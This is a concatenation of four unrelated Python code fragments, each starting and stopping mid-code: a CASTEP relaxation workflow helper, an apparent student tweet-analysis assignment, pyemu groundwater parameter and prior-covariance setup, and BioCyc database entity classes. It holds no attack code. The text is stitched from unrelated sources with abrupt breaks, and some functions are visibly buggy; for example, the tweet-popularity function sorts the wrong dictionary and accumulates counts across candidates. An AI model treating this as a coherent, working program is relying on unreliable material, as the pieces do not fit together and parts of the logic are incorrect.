shutil.copy2('{}.{}'.format(seed, ext), input_dir) def _setup_relaxation(self): """ Set up directories and files for relaxation. Raises: CalculationError: if structure has already exceeded geom_max_iter. CriticalError: if unable to split up calculation, normally indicating geom_max_iter is too small. """ LOG.info('Preparing to relax {seed}'.format(seed=self.seed)) self._setup_compute_dir(self.seed, self.compute_dir, custom_params=self.custom_params) # update res file with intermediate calculation if castep file is newer than res if os.path.isfile(self.seed + '.castep') and os.path.isfile(self.seed + '.res'): LOG.info('Trying to update res file with result from intermediate CASTEP file found in root_dir') if self.compute_dir is not None: shutil.copy2(self.seed + '.castep', self.compute_dir) castep_dict, success = castep2dict(self.seed + '.castep', db=False, verbosity=self.verbosity) if success: self.res_dict['geom_iter'] = castep_dict.get('geom_iter', 0) if os.path.getmtime(self.seed + '.res') < os.path.getmtime(self.seed + '.castep'): LOG.info('CASTEP file was updated more recently than res file, using intermediate structure...') self.res_dict.update(castep_dict) if self.compute_dir is not None: os.chdir(self.compute_dir) # copy initial res file to seed LOG.info('Writing fresh res file to start calculation from.') doc2res(self.res_dict, self.seed, info=False, hash_dupe=False, overwrite=True) self.cp_to_input(self.seed) # set up geom opt iteration options based on input/scraped parameters self._max_iter = self.calc_doc['geom_max_iter'] if self.res_dict.get('geom_iter'): self._max_iter -= self.res_dict['geom_iter'] else: self.res_dict['geom_iter'] = 0 if self.res_dict['geom_iter'] > self.calc_doc['geom_max_iter']: msg = '{} iterations already performed on structure, exiting...'.format(self.res_dict['geom_iter']) LOG.critical(msg) raise CalculationError(msg) # number of steps in fine and rough calcs respectively fine_iter = self.fine_iter rough_iter = self.rough_iter # number of calculations to run with rough_iter steps num_rough_iter = self.rough if 'geom_method' in self.calc_doc: if self.calc_doc['geom_method'].lower() == 'tpsd' and rough_iter < 3: rough_iter = 3 self._geom_max_iter_list = (num_rough_iter * [rough_iter]) self._max_iter -= num_rough_iter * rough_iter if self.squeeze: self._squeeze_list = [True for val in self._geom_max_iter_list] else: self._squeeze_list = [False for val in self._geom_max_iter_list] num_fine_iter = ceil(int(self._max_iter) / fine_iter) if self._max_iter > 0: if self._max_iter < fine_iter: fine_iter = self._max_iter num_fine_iter = 1 self._geom_max_iter_list.extend(num_fine_iter * [fine_iter]) self._squeeze_list.extend(num_fine_iter * [False]) LOG.info('Geometry optimisation iteration scheme set to {}'.format(self._geom_max_iter_list)) if self.squeeze: LOG.info('Squeeze scheme set to {}'.format(self._geom_max_iter_list)) if not self._geom_max_iter_list: msg = 'Could not divide up relaxation; consider increasing geom_max_iter' LOG.critical(msg) raise CriticalError(msg) def _update_input_files(self, seed, calc_doc, squeeze=None): """ Update the cell and param files for the next relaxation. Parameters: seed (str): the seedname to update. calc_doc (dict): the calculation dictionary to write to file. Keyword arguments: squeeze (float): external pressure to add this step """ if seed is None: seed = self.seed this_calc_doc = deepcopy(calc_doc) # update cell if os.path.isfile(seed + '.cell'): os.remove(seed + '.cell') if squeeze is not None: if squeeze: LOG.info('Applying pressure of {} GPa to this calculation'.format(squeeze)) this_calc_doc['external_pressure'] = [[squeeze, 0, 0], [0, squeeze, 0], [0, 0, squeeze]] else: LOG.info('Pressure reset to {}'.format(self._target_pressure)) this_calc_doc['external_pressure'] = self._target_pressure if self.kpts_1D: n_kz = ceil(1 / (this_calc_doc['lattice_abc'][0][2] * self._target_spacing)) if n_kz % 2 == 1: n_kz += 1 this_calc_doc['kpoints_mp_grid'] = [1, 1, n_kz] if 'kpoints_mp_spacing' in calc_doc: del calc_doc['kpoints_mp_spacing'] doc2cell(this_calc_doc, seed, hash_dupe=False, spin=self.spin) # update param if not self.custom_params: if os.path.isfile(seed + '.param'): os.remove(seed + '.param') doc2param(this_calc_doc, seed, hash_dupe=False, spin=self.spin) LOG.debug('Calculation dictionary: {}' .format(matador.utils.print_utils.dumps(this_calc_doc, indent=None))) def tidy_up(self, seed): """ Delete all created files before quitting. Parameters: seed (str): filename for structure. """ files = glob.glob(seed + '.*') if self.compute_dir is not None: files += glob.glob(self.root_folder + '/' + seed + '.*') if files: LOG.info('Tidying up remaining files: {files}'.format(files=files)) for f in files: # if we're working in a compute dir, then delete any remaining files in base dir # otherwise, only delete things that we dont care about, i.e. non-res/castep in # case they were not correctly moved to completed/bad_castep by the other routines if self.compute_dir is not None or (not (f.endswith('.res') or f.endswith('.castep'))): os.remove(f) def _update_castep_output_files(self, seed, opti_dict=None): """ Copy new data to root CASTEP output files and update the results dict. Keyword arguments: opti_dict (dict): intermediate calculation results. """ LOG.info('Updating .res and .castep files in root_dir with new results') if opti_dict is not None: if os.path.isfile(seed + '.res'): os.rename('{}.res'.format(seed), '{}.res_bak'.format(seed)) try: doc2res(opti_dict, seed, hash_dupe=False) except CalculationError: doc2res(opti_dict, seed, hash_dupe=False, info=False) if os.path.isfile(seed + '.res_bak'): os.remove(seed + '.res_bak') self.res_dict.update(opti_dict) if self.compute_dir is not None: if os.path.isfile(seed + '.res'): shutil.copy2(seed + '.res', self.root_folder) if os.path.isfile(seed + '.castep'): shutil.copy2(seed + '.castep', self.root_folder) def _finalise_result(self, intermediate=False): """ Push to queue if necessary and return status. Keyword arguments: intermediate (bool): whether we want to run more calculations on the output of this, i.e. whether to move to completed or not. Returns: bool: True is relaxation was successful, False otherwise. """ LOG.info('Finalising calculation...') try: success = self.res_dict.get('optimised', False) except AttributeError: success = False LOG.info('Was calculation successful? {success}'.format(success=success)) if self.output_queue is not None: LOG.info('Pushing results to output queue') self.output_queue.put(self.res_dict) if success: if not intermediate: self.mv_to_completed(self.seed, completed_dir=self.paths['completed_dir']) else: self.mv_to_bad(self.seed) if success: self.final_result = self.res_dict if not intermediate: # clean up rest of files self.tidy_up(self.seed) return success def _times_up(self, process): """ If walltime has nearly expired, run this function to kill the process and unlock it for restarted calculations. Parameters: subprocess.Popen: running process to be killed. """ if self.compute_dir is not None: LOG.info('Cleaning up compute_dir: {dir}'.format(dir=self.compute_dir)) for f in glob.glob('{}.*'.format(self.seed)): shutil.copy2(f, self.root_folder) os.remove(f) LOG.info('Removing lock file so calculation can be continued.') if os.path.isfile('{}/{}{}'.format(self.root_folder, self.seed, '.res.lock')): os.remove('{}/{}{}'.format(self.root_folder, self.seed, '.res.lock')) @staticmethod def remove_compute_dir_if_finished(compute_dir): """ Delete the compute directory, provided it contains no calculation data. Parameters: compute_dir (str): path to compute directory. Returns: bool: True if folder was deleted as no res/castep files were found, otherwise False. """ LOG.info('Checking if compute_dir still contains calculations...') if not os.path.isdir(compute_dir): return False files = glob.glob(compute_dir + '/*') LOG.debug('Found {files} in {dir}'.format(files=files, dir=compute_dir)) for fname in files: if fname.endswith('.res') or fname.endswith('.castep'): LOG.debug('Not removing {dir} as it still contains calculation {fname}'.format( dir=compute_dir, fname=fname)) return False # remove files in directory, then delete directory LOG.debug('Deleting files {files} from {dir}'.format(files=files, dir=compute_dir)) for fname in files: if os.path.isfile(fname): try: os.remove(fname) except FileNotFoundError: pass if os.path.isdir(compute_dir): LOG.debug('Deleting directory {dir}'.format(dir=compute_dir)) try: os.rmdir(compute_dir) except OSError: LOG.debug('Unable to delete directory {} as it still contains files.'.format(compute_dir)) if os.path.islink(compute_dir.split('/')[-1] + '_link'): os.remove(compute_dir.split('/')[-1] + '_link') return True def _setup_compute_dir(self, seed, compute_dir, custom_params=False, generic=False): """ Create the desired directory if it doens't exist, and try to link to it in the current folder. Parameters: seed (str): name of seed. compute_dir (str): name of directory to make. Keyword arguments: custom_params (bool): whether to try to copy custom param files into this directory. """ if compute_dir is None: return LOG.info('Using compute_dir: {}'.format(compute_dir)) if not os.path.isdir(compute_dir): try: os.makedirs(compute_dir, exist_ok=True) except PermissionError as exc: raise
TIE = "Tie" HEADER_LENGTH = 6 ANONYMOUS = 'unknown' # A helper that splits the string into a list of words. def get_pure_wordlist(tweet): """ (str) -> list of str Return a list of string containing all words ending with alphanumerics. >>> get_pure_wordlist('Hello! @Leehom- @StarWay.') ['hello', '@leehom', '@starway'] >>> get_pure_wordlist('@Here: @1223 @here: me') ['@here', '@1223', '@here', 'me'] """ result = [] wordlist = tweet.split() for word in wordlist: if not word[-1].isalnum(): result.append(word.lower()[:len(word) - 1]) else: result.append(word.lower()) return result # 1. def extract_mentions(tweet): """ (str) -> list of str Precondition: 1 <= len(tweet) <= 140. Return a list of string containing all of the mentions in the tweet. >>> extract_mentions('Hello! @Leehom- @StarWay.') ['leehom', 'starway'] >>> extract_mentions('@Here: @1223 @Gu&a$ @here: me @...') ['here', '1223', 'gu', 'here', ''] """ result = [] lst = get_pure_wordlist(tweet) for word in lst: # set initial index for index in word i = 1 if word.startswith('@'): # move index to the right if the ith character is alphanumeric while i < len(word) and word[i].isalnum(): i = i + 1 result.append(word[1:i]) return result # 2. def extract_hashtags(tweet): """ (str) -> list of str Return a list of strings containing all unique hashtags in the tweet. >>> extract_hashtags('I love #autumn, #fall%3525 and want to #fall') ['autumn', 'fall'] >>> extract_hashtags('#Life is so hard, #keep up with #life- #...') ['life', 'keep', ''] """ result = [] # loop over words from lowercase pure wordlist for word in get_pure_wordlist(tweet): i = 1 if word.startswith('#') and len(word) >= 2: while i < len(word) and word[i].isalnum(): i = i + 1 if word[1:i] not in result: result.append(word[1:i]) return result # 3. def count_words(tweet, dic): """ (str, dict of {str: int}) -> None Update the counts of words from the tweet in the dic. >>> tweet = "@utmandrew Don't you wish you? #MakeAmerican" >>> dic = {'you': 1, 'fun': 4} >>> count_words(tweet, dic) >>> dic == {'you': 3, 'wish': 1, 'fun': 4, 'dont': 1} True """ for word in get_pure_wordlist(tweet): for item in range(1, len(word) - 1): # remove non alphanumeric characters from each word if not word[item].isalnum(): word = word[:item] +word[item + 1:] if word[0] != '@' and word[0] != '#' and not word.startswith('http'): # add word that are not in dic, assign value 1 if word not in dic: dic[word] = 1 # add value to the original value plus 1 for those already in dic elif word in dic: dic[word] = dic[word] + 1 #4 def common_words(dic, N): """(dict of {str: int}, int) -> None Update the dic so that it contains only N most frequent words. >>> dic = {'I': 10, 'you': 5, 'miss': 8, 'here': 6, 'how': 6} >>> common_words(dic, 3) >>> dic == {'I': 10, 'miss': 8} True >>> dic = {'I':10, 'you': 5, 'miss': 8, 'here': 2, 'how': 6} >>> common_words(dic, 6) >>> dic == {'I': 10, 'you': 5, 'miss': 8, 'here': 2, 'how': 6} True """ ndic = {} # get a list of sorted words wordlist = sorted(dic, key = dic.get, reverse = True) # loop over the wordlist to find words that has frequency not equal to N+1 if len(dic) > N: for i in range(N): if dic[wordlist[i]] != dic[wordlist[N]]: # if the frequency is not equal to N+1 th, put it into ndic ndic[wordlist[i]] = dic[wordlist[i]] # when the foor loop is over, clear dic dic.clear() # update the dic by ndic that is generated above dic.update(ndic) # 5. def read_tweets(file): """ (file open for reading) -> dict of {str: list of tweet tuples} Return a dictionary with the names of the candidates as keys, and tweet tuple in the form of (candidate, tweet text, date, source, favorite count, retweet count)as values """ dic = {} key = "" content = [] for line in file: # read the line of candidate name if line.endswith(':\n') and 2 <= len(line.split()) <= 4: key = line.strip()[: -1] # store the candadate as a key in dic dic[key] = [] else: # for lines before end of tweet if line != "<<<EOT\n": # store the header of a tweet if len(line.split(',')) == HEADER_LENGTH: header = line.split(',') # for non-header, we accumulate the content content.append(line[:len(line)]) else: # use a helper function to generate the tuple for the value help_read_tweet(dic, key, content) content = [] return dic def help_read_tweet(dic, key, content): """ (dic, str, list of str) --> None Update the dictionary with dic, key as the key, and content as value. >>> key = 'Donald Trump' >>> dic = {key: []} >>> content = ['7,1,Q NY,iPhone,1,5\\n', '#MAGA\\n'] >>> help_read_tweet(dic, key, content) >>> dic {'<NAME>': [('<NAME>', '#MAGA\\n', 1, 'iPhone', 1, 5)]} """ txt = "" for s in content: if len(s.split(',')) == HEADER_LENGTH and s.split(',')[0].isnumeric(): info = s.split(',') else: txt += s text = txt[:len(txt)] value = (key, text, int(info[1]), info[3], int(info[4]), int(info[5][:-1])) dic[key].append(value) # 6. def most_popular(dic, d1, d2): """ ((dict of {str: list of tweet tuples}, int, int) -> str Precondition: d1 <= d2 Return the most popular candidate on Twitter between d1 and d2. In the case of a tie, return the string "Tie". """ #accumulate counts for each candidate counts = 0 # build a count dictionary for each candidate cdic = {} for candidate in dic: for tweet in dic[candidate]: # find tweet under the required time period if d1 <= tweet[2] <= d2: counts += tweet[-1] + tweet[-2] cdic[candidate] = counts popular_list = sorted(dic, key = dic.get, reverse = True) if dic[popular_list[0]] != dic[popular_list[1]]: return popular_list[0] else: return TIE # 7. def detect_author(dic, tweet): """(dict of {str: list of tweet tuples}, str) -> str Return the username of the most likely author of that tweet. If the tweet contains a hashtag that only one of the candidates uses, then the likely author is the candidate that uses that hashtag. If the tweet contains no hashtags or more than one hashtag that are uniquely used by a single candidate, return the string "Unknown." >>> dic = {'D': [('D', '#a #i', 1, 'e', 0, 7)], 'M': [('M', '#... #a',\ 1, 'e', 0, 7)]} >>> tweet = "hi! #i" >>> detect_author(dic, tweet) 'D' """ tweet_ht = extract_hashtags(tweet) count = 0 # count hashtag in tweet for i in range(len(tweet_ht)): if tweet_ht[i] in unique_hashtag(all_hashtag(dic)): count += 1 for ht in tweet_ht: # if hashtag is a unique hashtag in dic and counts only once in tweet while ht in unique_hashtag(all_hashtag(dic)) and count == 1: return unique_hashtag(all_hashtag(dic))[ht] return ANONYMOUS def all_hashtag(dic): """(dict of {str: list of tweet tuples}, str) -> dict of {str: list of str} Return a dictionary of all hashtags for each candidate in dic. >>> dic = {'D':[('D', 'F #i', 8, 't', 2, 3), ('D', '#...', 1, 'e', 0, 7)]} >>> all_hashtag(dic) {'D': ['i', '']} """ ndic = {} hashtaglst = [] for candidate in dic: for i in range(len(dic[candidate])): tweet = dic[candidate][i] hashtag = extract_hashtags(tweet[1]) if hashtag not in hashtaglst: hashtaglst += hashtag ndic[candidate] = (hashtaglst) hashtaglst = [] return ndic # helper function that finds all unique hashtages for each candidate def unique_hashtag(dic): """dict of {str: list of str} -> dict of {str: list of str}} Return a dictionary with hashtag as keys and candidate in dic as values. >>> dic = {'D': ['a', '1', '2'], 'M': ['a', 'i'], 'N': ['1', '0', '']} >>> unique_hashtag(dic) == {'2': 'D', 'i': 'M', '0': 'N', '': 'N'} True """ unique_ht = {} extract_unique = {} # First reverse the dictionary for candidate in dic: for i in range(len(dic[candidate])): hashtag = dic[candidate][i] if hashtag not in unique_ht:
ll in layers[i+1:]: # pp = set(kl_dict[ll]) # d = pp - p # kl_dict[ll] = list(d) kl_prefix = list(kl_df.loc[:, "prefix"]) kl_array_file = {p: m for p, m in zip(kl_df.prefix, kl_df.mlt_file)} self.logger.statement("kl_prefix: {0}".format(str(kl_prefix))) fac_file = os.path.join(self.m.model_ws, "kl.fac") self.log("calling kl_setup() with factors file {0}".format(fac_file)) kl_df = kl_setup( self.kl_num_eig, self.m.sr, self.kl_geostruct, kl_prefix, factors_file=fac_file, basis_file=fac_file + ".basis.jcb", tpl_dir=self.m.model_ws, ) self.logger.statement("{0} kl parameters created".format(kl_df.shape[0])) self.logger.statement("kl 'pargp':{0}".format(",".join(kl_df.pargp.unique()))) self.log("calling kl_setup() with factors file {0}".format(fac_file)) kl_mlt_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix] for prefix in kl_df.prefix.unique(): prefix_df = kl_df.loc[kl_df.prefix == prefix, :] in_file = os.path.split(prefix_df.loc[:, "in_file"].iloc[0])[-1] assert prefix in mlt_df.prefix.values, "{0}:{1}".format( prefix, mlt_df.prefix ) mlt_df.loc[mlt_df.prefix == prefix, "pp_file"] = in_file mlt_df.loc[mlt_df.prefix == prefix, "fac_file"] = os.path.split(fac_file)[ -1 ] mlt_df.loc[mlt_df.prefix == prefix, "pp_fill_value"] = 1.0 mlt_df.loc[mlt_df.prefix == prefix, "pp_lower_limit"] = 1.0e-10 mlt_df.loc[mlt_df.prefix == prefix, "pp_upper_limit"] = 1.0e+10 print(kl_mlt_df) mlt_df.loc[mlt_df.suffix == self.kl_suffix, "tpl_file"] = np.NaN self.par_dfs[self.kl_suffix] = kl_df # calc factors for each layer def _setup_array_pars(self): """main entry point for setting up array multipler parameters""" mlt_df = self._prep_mlt_arrays() if mlt_df is None: return mlt_df.loc[:, "tpl_file"] = mlt_df.mlt_file.apply( lambda x: os.path.split(x)[-1] + ".tpl" ) # mlt_df.loc[mlt_df.tpl_file.apply(lambda x:pd.notnull(x.pp_file)),"tpl_file"] = np.NaN mlt_files = mlt_df.mlt_file.unique() # for suffix,tpl_file,layer,name in zip(self.mlt_df.suffix, # self.mlt_df.tpl,self.mlt_df.layer, # self.mlt_df.prefix): par_dfs = {} for mlt_file in mlt_files: suffixes = mlt_df.loc[mlt_df.mlt_file == mlt_file, "suffix"] if suffixes.unique().shape[0] != 1: self.logger.lraise("wrong number of suffixes for {0}".format(mlt_file)) suffix = suffixes.iloc[0] tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"] if tpl_files.unique().shape[0] != 1: self.logger.lraise("wrong number of tpl_files for {0}".format(mlt_file)) tpl_file = tpl_files.iloc[0] layers = mlt_df.loc[mlt_df.mlt_file == mlt_file, "layer"] # if layers.unique().shape[0] != 1: # self.logger.lraise("wrong number of layers for {0}"\ # .format(mlt_file)) layer = layers.iloc[0] names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "prefix"] if names.unique().shape[0] != 1: self.logger.lraise("wrong number of names for {0}".format(mlt_file)) name = names.iloc[0] attr_names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "attr_name"] if attr_names.unique().shape[0] != 1: self.logger.lraise( "wrong number of attr_names for {0}".format(mlt_file) ) attr_name = attr_names.iloc[0] # ib = self.k_zone_dict[layer] df = None if suffix == self.cn_suffix: self.log("writing const tpl:{0}".format(tpl_file)) # df = self.write_const_tpl(name,tpl_file,self.m.bas6.ibound[layer].array) try: df = write_const_tpl( name, os.path.join(self.m.model_ws, tpl_file), self.cn_suffix, self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr, ) except Exception as e: self.logger.lraise( "error writing const template: {0}".format(str(e)) ) self.log("writing const tpl:{0}".format(tpl_file)) elif suffix == self.gr_suffix: self.log("writing grid tpl:{0}".format(tpl_file)) # df = self.write_grid_tpl(name,tpl_file,self.m.bas6.ibound[layer].array) try: df = write_grid_tpl( name, os.path.join(self.m.model_ws, tpl_file), self.gr_suffix, self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr, ) except Exception as e: self.logger.lraise( "error writing grid template: {0}".format(str(e)) ) self.log("writing grid tpl:{0}".format(tpl_file)) elif suffix == self.zn_suffix: self.log("writing zone tpl:{0}".format(tpl_file)) if np.all( [isinstance(v, dict) for v in self.k_zone_dict.values()] ): # check is dict of dicts if attr_name in [p.split(".")[-1] for p in self.k_zone_dict.keys()]: k_zone_dict = next( k_dict for p, k_dict in self.k_zone_dict.items() if p.split(".")[-1] == attr_name ) # get dict relating to parameter prefix else: assert ( "general_zn" in self.k_zone_dict.keys() ), "Neither {0} nor 'general_zn' are in k_zone_dict keys: {1}".format( attr_name, self.k_zone_dict.keys() ) k_zone_dict = self.k_zone_dict["general_zn"] else: k_zone_dict = self.k_zone_dict # df = self.write_zone_tpl(self.m, name, tpl_file, self.k_zone_dict[layer], self.zn_suffix, self.logger) try: df = write_zone_tpl( name, os.path.join(self.m.model_ws, tpl_file), self.zn_suffix, k_zone_dict[layer], (self.m.nrow, self.m.ncol), self.m.sr, ) except Exception as e: self.logger.lraise( "error writing zone template: {0}".format(str(e)) ) self.log("writing zone tpl:{0}".format(tpl_file)) if df is None: continue if suffix not in par_dfs: par_dfs[suffix] = [df] else: par_dfs[suffix].append(df) for suf, dfs in par_dfs.items(): self.par_dfs[suf] = pd.concat(dfs) if self.pp_suffix in mlt_df.suffix.values: self.log("setting up pilot point process") self._pp_prep(mlt_df) self.log("setting up pilot point process") if self.gr_suffix in mlt_df.suffix.values: self.log("setting up grid process") self._grid_prep() self.log("setting up grid process") if self.kl_suffix in mlt_df.suffix.values: self.log("setting up kl process") self._kl_prep(mlt_df) self.log("setting up kl process") mlt_df.to_csv(os.path.join(self.m.model_ws, "arr_pars.csv")) ones = np.ones((self.m.nrow, self.m.ncol)) for mlt_file in mlt_df.mlt_file.unique(): self.log("save test mlt array {0}".format(mlt_file)) np.savetxt(os.path.join(self.m.model_ws, mlt_file), ones, fmt="%15.6E") self.log("save test mlt array {0}".format(mlt_file)) tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"] if tpl_files.unique().shape[0] != 1: self.logger.lraise("wrong number of tpl_files for {0}".format(mlt_file)) tpl_file = tpl_files.iloc[0] if pd.notnull(tpl_file): self.tpl_files.append(tpl_file) self.in_files.append(mlt_file) # for tpl_file,mlt_file in zip(mlt_df.tpl_file,mlt_df.mlt_file): # if pd.isnull(tpl_file): # continue # self.tpl_files.append(tpl_file) # self.in_files.append(mlt_file) os.chdir(self.m.model_ws) try: apply_array_pars() except Exception as e: os.chdir("..") self.logger.lraise( "error test running apply_array_pars():{0}".format(str(e)) ) os.chdir("..") line = "pyemu.helpers.apply_array_pars()\n" self.logger.statement("forward_run line:{0}".format(line)) self.frun_pre_lines.append(line) def _setup_observations(self): """main entry point for setting up observations""" obs_methods = [ self._setup_water_budget_obs, self._setup_hyd, self._setup_smp, self._setup_hob, self._setup_hds, self._setup_sfr_obs, ] obs_types = [ "mflist water budget obs", "hyd file", "external obs-sim smp files", "hob", "hds", "sfr", ] self.obs_dfs = {} for obs_method, obs_type in zip(obs_methods, obs_types): self.log("processing obs type {0}".format(obs_type)) obs_method() self.log("processing obs type {0}".format(obs_type)) def draw(self, num_reals=100, sigma_range=6, use_specsim=False, scale_offset=True): """draw from the geostatistically-implied parameter covariance matrix Args: num_reals (`int`): number of realizations to generate. Default is 100 sigma_range (`float`): number of standard deviations represented by the parameter bounds. Default is 6. use_specsim (`bool`): flag to use spectral simulation for grid-based parameters. Requires a regular grid but is wicked fast. Default is False scale_offset (`bool`, optional): flag to apply scale and offset to parameter bounds when calculating variances - this is passed through to `pyemu.Cov.from_parameter_data`. Default is True. Note: operates on parameters by groups to avoid having to construct a very large covariance matrix for problems with more the 30K parameters. uses `helpers.geostatitical_draw()` Returns: `pyemu.ParameterEnsemble`: The realized parameter ensemble """ self.log("drawing realizations") struct_dict = {} gr_par_pe = None if self.pp_suffix in self.par_dfs.keys(): pp_df = self.par_dfs[self.pp_suffix] pp_dfs = [] for pargp in pp_df.pargp.unique(): gp_df = pp_df.loc[pp_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") pp_dfs.append(p_df) # pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()] struct_dict[self.pp_geostruct] = pp_dfs if self.gr_suffix in self.par_dfs.keys(): gr_df = self.par_dfs[self.gr_suffix] if not use_specsim: gr_dfs = [] for pargp in gr_df.pargp.unique(): gp_df = gr_df.loc[gr_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") gr_dfs.append(p_df) # gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()] struct_dict[self.grid_geostruct] = gr_dfs else: if not pyemu.geostats.SpecSim2d.grid_is_regular( self.m.dis.delr.array, self.m.dis.delc.array ): self.logger.lraise( "draw() error: can't use spectral simulation with irregular grid" ) gr_df.loc[:, "i"] = gr_df.parnme.apply(lambda x: int(x[-6:-3])) gr_df.loc[:, "j"] = gr_df.parnme.apply(lambda x: int(x[-3:])) if gr_df.i.max() > self.m.nrow - 1 or gr_df.i.min() < 0: self.logger.lraise( "draw(): error parsing grid par names for 'i' index" ) if gr_df.j.max() > self.m.ncol - 1 or gr_df.j.min() < 0: self.logger.lraise( "draw(): error parsing grid par names for 'j' index" ) self.log("spectral simulation for grid-scale pars") ss = pyemu.geostats.SpecSim2d( delx=self.m.dis.delr.array, dely=self.m.dis.delc.array, geostruct=self.grid_geostruct, ) gr_par_pe = ss.grid_par_ensemble_helper( pst=self.pst, gr_df=gr_df, num_reals=num_reals, sigma_range=sigma_range, logger=self.logger, ) self.log("spectral simulation for grid-scale pars") if "temporal_list" in self.par_dfs.keys(): bc_df = self.par_dfs["temporal_list"] bc_df.loc[:, "y"] = 0 bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days) bc_dfs = [] for pargp in bc_df.pargp.unique(): gp_df = bc_df.loc[bc_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") # print(p_df) bc_dfs.append(p_df) # bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()] struct_dict[self.temporal_list_geostruct] = bc_dfs if "spatial_list" in self.par_dfs.keys(): bc_df = self.par_dfs["spatial_list"] bc_dfs = [] for pargp in bc_df.pargp.unique(): gp_df = bc_df.loc[bc_df.pargp == pargp, :] # p_df = gp_df.drop_duplicates(subset="parnme") # print(p_df) bc_dfs.append(gp_df) struct_dict[self.spatial_list_geostruct] = bc_dfs pe = geostatistical_draws( self.pst, struct_dict=struct_dict, num_reals=num_reals, sigma_range=sigma_range, scale_offset=scale_offset, ) if gr_par_pe is not None: pe.loc[:, gr_par_pe.columns] = gr_par_pe.values self.log("drawing realizations") return pe def build_prior( self, fmt="ascii", filename=None, droptol=None, chunk=None, sigma_range=6 ): """build and optionally save the prior parameter covariance matrix. Args: fmt (`str`, optional): the format to save the cov matrix. Options are "ascii","binary","uncfile", "coo". Default is "ascii". If "none" (lower case string, not None), then no file is created. filename (`str`, optional): the filename to save the prior cov matrix to. If None, the name is formed using model nam_file name. Default is None. droptol (`float`, optional): tolerance for dropping near-zero values when writing compressed binary. Default is None. chunk (`int`, optional): chunk size to write in a single pass - for binary only. Default is None (no chunking). sigma_range (`float`): number of standard deviations represented by the parameter bounds. Default is 6. Returns: `pyemu.Cov`: the full prior parameter covariance matrix, generated by processing parameters by groups """ fmt = fmt.lower() acc_fmts = ["ascii", "binary", "uncfile", "none", "coo"] if fmt not in acc_fmts: self.logger.lraise( "unrecognized prior save 'fmt':{0}, options are: {1}".format( fmt, ",".join(acc_fmts) ) ) self.log("building prior covariance matrix") struct_dict = {} if self.pp_suffix in self.par_dfs.keys(): pp_df = self.par_dfs[self.pp_suffix] pp_dfs = [] for pargp in pp_df.pargp.unique(): gp_df = pp_df.loc[pp_df.pargp == pargp, :] p_df =
xml) self.cache(obj) # Will cache either a real object, or a BioCycEntityNotFound if obj: # Found objs.append(obj) else: # Not found (BioCycEntityNotFound) objs.append(None) if t != list: return objs[0] else: return objs def create_obj_from_xml(self, id, xml): # Get the object type from the returned XML # by matching the provided lists for schema-id for o in AVAILABLE_OBJECT_TYPES: if o.xml_schema_id: x = xml.find(o.xml_schema_id) if x: # Found it # Create the base object, populating from the xml # Import the xml to the object (using object specific import_from_xml) obj = o( id=id, from_xml=x) return obj else: return BioCycEntityNotFound(id, self.org_id) def biocyc_obj_url(self, obj): return "http://www.biocyc.org/%s/NEW-IMAGE?object=%s" % (self.org_id, obj) biocyc = BioCyc() class BioCycEntityNotFound(object): def __init__(self, id=None, org_id=None, *args, **kwargs): self.type = type(self).__name__.lower() self.id = id self.org_id = org_id self.created_at = datetime.now() def __bool__(self): return False def __nonzero__(self): return False # Global Pathomx db object class to simplify object display, synonym referencing, etc. class BioCycEntityBase(object): xml_schema_id = None ipython_attribs = [ ('Name', 'name_as_html'), ('BioCyc ID', 'biocyc_link_html'), ('Org ID', 'org_id'), ('Synonyms', 'synonyms'), ('INCHI', 'inchi'), ('Molecular weight', 'molecular_weight'), ('Gibbs 0', 'gibbs0'), ('Parents', '_parents'), ('Instances', '_instances'), ('Reactions', '_reactions'), ('Pathways', '_pathways'), ('Super pathways', '_super_pathways'), ('Species', '_species'), ('Taxonomic range', '_taxonomic_range'), ('Database links', 'dblinks_link_html')] def __init__(self, id=None, from_xml=None, *args, **kwargs): self.type = type(self).__name__.lower() self.id = id # Parent and child relationships self._parents = [] self._instances = [] self.name = None self.name_as_html = None self.synonyms = [] self.dblinks = {} # Timestamp object on creation self.created_at = datetime.now() if from_xml: self.import_from_xml(from_xml) def __unicode__(self): if self.name: return self.name else: return self.id def __str__(self): return self.__unicode__() def __repr__(self): return self.__unicode__() def _repr_html_(self): rows = [] for l, attr in self.ipython_attribs: val = getattr(self, attr, None) if val: # Manipulate to text if type(val) == list: val = ', '.join(val) elif type(val) == dict: val = ', '.join( ['%s: %s' % (k,v) for k,v in val.items() ] ) rows.append('<tr><th>%s</th><td>%s</td></tr>' % (l, val) ) return "<table>" + ''.join(rows) + "</table>" def __eq__(self, other): return type(other) == type(self) and self.type == other.type and self.id == other.id def __hash__(self): return hash( (self.type, self.id) ) @property def cachepath(self): return os.path.join(self.org_id, self.type, self.id) @property def url(self): return 'http://biocyc.org/%s/NEW-IMAGE?type=%s&object=%s' % (self.org_id, self.type, self.id) def import_from_xml(self, xml): ''' Standard imports for all types of object These must fail gracefully, skip if not found ''' self._import_orgid(xml) self._import_parents_from_xml(xml) self._import_instances_from_xml(xml) self._import_common_name(xml) self._import_synonyms(xml) self._import_dblinks(xml) def _import_orgid(self, xml): self.org_id = xml.attrib['orgid'] def _import_parents_from_xml(self, xml): parents = xml.iterfind('parent') for p in parents: for o in p: # Store a tuple of orgid, identifier self._parents.append( o.attrib['frameid'] ) #( o.attrib['orgid'], ) ) def _import_instances_from_xml(self, xml): instances = xml.iterfind('instance') for p in instances: for o in p: # Store a tuple of orgid, identifier self._instances.append( o.attrib['frameid'] ) #( o.attrib['orgid'], ) ) def _import_common_name(self, xml): e = xml.find('common-name') if e is not None: self.name_as_html = e.text self.name = to_plain_text(self.name_as_html) def _import_synonyms(self, xml): es = 